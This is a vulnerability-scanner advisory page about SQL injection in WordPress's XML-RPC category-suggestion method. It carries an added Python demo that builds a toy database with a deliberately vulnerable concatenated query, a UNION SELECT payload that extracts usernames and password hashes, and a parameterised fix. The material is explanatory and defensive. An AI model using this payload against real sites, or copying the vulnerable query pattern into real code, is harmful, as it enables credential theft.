FreeBSD : wordpress -- XMLRPC SQL Injection (0838733d-1698-11dc-a197-0011098b2f36)
Severity: Medium / Nessus Plugin ID 25591
Synopsis
The remote FreeBSD host is missing one or more security-related updates.
Description
Secunia reports :
Slappter has discovered a vulnerability in WordPress, which can be exploited by malicious users to conduct SQL injection attacks.
Input passed to the 'wp.suggestCategories' method in xmlrpc.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation allows e.g. retrieving usernames and password hashes, but requires valid user credentials and knowledge of the database table prefix.
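The two caveats in the advisory (valid credentials and knowledge of the table prefix) follow directly from the shape of the bug, and the fix is the usual one: bind the caller's string as a parameter instead of splicing it into the statement. The following is an added illustration written for this page, not WordPress code and not the actual xmlrpc.php query: a toy authenticated category-suggestion method over sqlite3, with the vulnerable concatenating form beside the parameterised one. The schema, column names, `wp_`/`blog_` prefixes, query template, sha256 password stand-in and demo credentials are all assumptions for the example; it also shows what happens when the attacker guesses the prefix wrong, which the advisory text only states.

```python
"""Added illustration, not WordPress code: a toy stand-in for an authenticated
XML-RPC category-suggestion method, backed by sqlite3, showing why building the
SQL by string concatenation lets a logged-in caller read the users table, why
the attacker must know the table prefix, and how a parameterised query closes
the hole. Schema, column names, table prefix, query shape and the demo
credentials are all assumptions for this example."""
import hashlib
import sqlite3


def hash_pw(password: str) -> str:
    """Stand-in for the real password hashing; sha256 keeps the demo self-contained."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_db(prefix: str = "wp_") -> sqlite3.Connection:
    """Constructed sample database with the two tables the demo needs."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {prefix}terms (term_id INTEGER, name TEXT);
        CREATE TABLE {prefix}users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO {prefix}terms VALUES (1, 'Security'), (2, 'Secrets');
    """)
    db.execute(f"INSERT INTO {prefix}users VALUES (1, 'admin', ?)", (hash_pw("s3cret"),))
    db.execute(f"INSERT INTO {prefix}users VALUES (2, 'author', ?)", (hash_pw("pencil"),))
    db.commit()
    return db


def login_ok(db, prefix, user, password) -> bool:
    """The method is only reachable with valid credentials (parameterised on purpose)."""
    row = db.execute(
        f"SELECT 1 FROM {prefix}users WHERE user_login = ? AND user_pass = ?",
        (user, hash_pw(password)),
    ).fetchone()
    return row is not None


def suggest_vulnerable(db, prefix, user, password, fragment):
    """Caller-controlled fragment is spliced straight into the LIKE pattern."""
    if not login_ok(db, prefix, user, password):
        raise PermissionError("valid credentials required")
    sql = f"SELECT term_id, name FROM {prefix}terms WHERE name LIKE '%{fragment}%'"
    return db.execute(sql).fetchall()


def suggest_fixed(db, prefix, user, password, fragment):
    """Same lookup with the pattern bound as a parameter: the fragment is data only."""
    if not login_ok(db, prefix, user, password):
        raise PermissionError("valid credentials required")
    sql = f"SELECT term_id, name FROM {prefix}terms WHERE name LIKE ?"
    return db.execute(sql, (f"%{fragment}%",)).fetchall()


def dump_users_payload(guessed_prefix: str) -> str:
    """Closes the LIKE quote, UNIONs login:hash pairs out of the guessed users
    table, and comments out the trailing %' left by the template."""
    return (f"' UNION SELECT ID, user_login || ':' || user_pass "
            f"FROM {guessed_prefix}users -- ")


def leaked_hashes(db, prefix, user, password, guessed_prefix):
    """login:hash strings the attacker gets back from the vulnerable method, or
    None when the guessed prefix names a table that does not exist."""
    try:
        rows = suggest_vulnerable(db, prefix, user, password,
                                  dump_users_payload(guessed_prefix))
    except sqlite3.OperationalError:  # e.g. "no such table: blog_users"
        return None
    return [name for _, name in rows if ":" in name]


if __name__ == "__main__":
    db = build_db("wp_")
    print("normal:", suggest_vulnerable(db, "wp_", "author", "pencil", "Sec"))
    print("leaked:", leaked_hashes(db, "wp_", "author", "pencil", "wp_"))
    print("wrong prefix:", leaked_hashes(db, "wp_", "author", "pencil", "blog_"))
    print("fixed:", suggest_fixed(db, "wp_", "author", "pencil", dump_users_payload("wp_")))
```

Run as a script it prints the ordinary suggestion result, the login:hash pairs a low-privileged but authenticated user pulls out of the users table through the concatenated query, `None` when the payload names a non-existent `blog_users` table, and an empty list from the parameterised version fed the same payload. The credential check is parameterised deliberately so that the only way in is the suggestion method itself, which matches the advisory's "requires valid user credentials" caveat.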
Solution
Update the affected packages.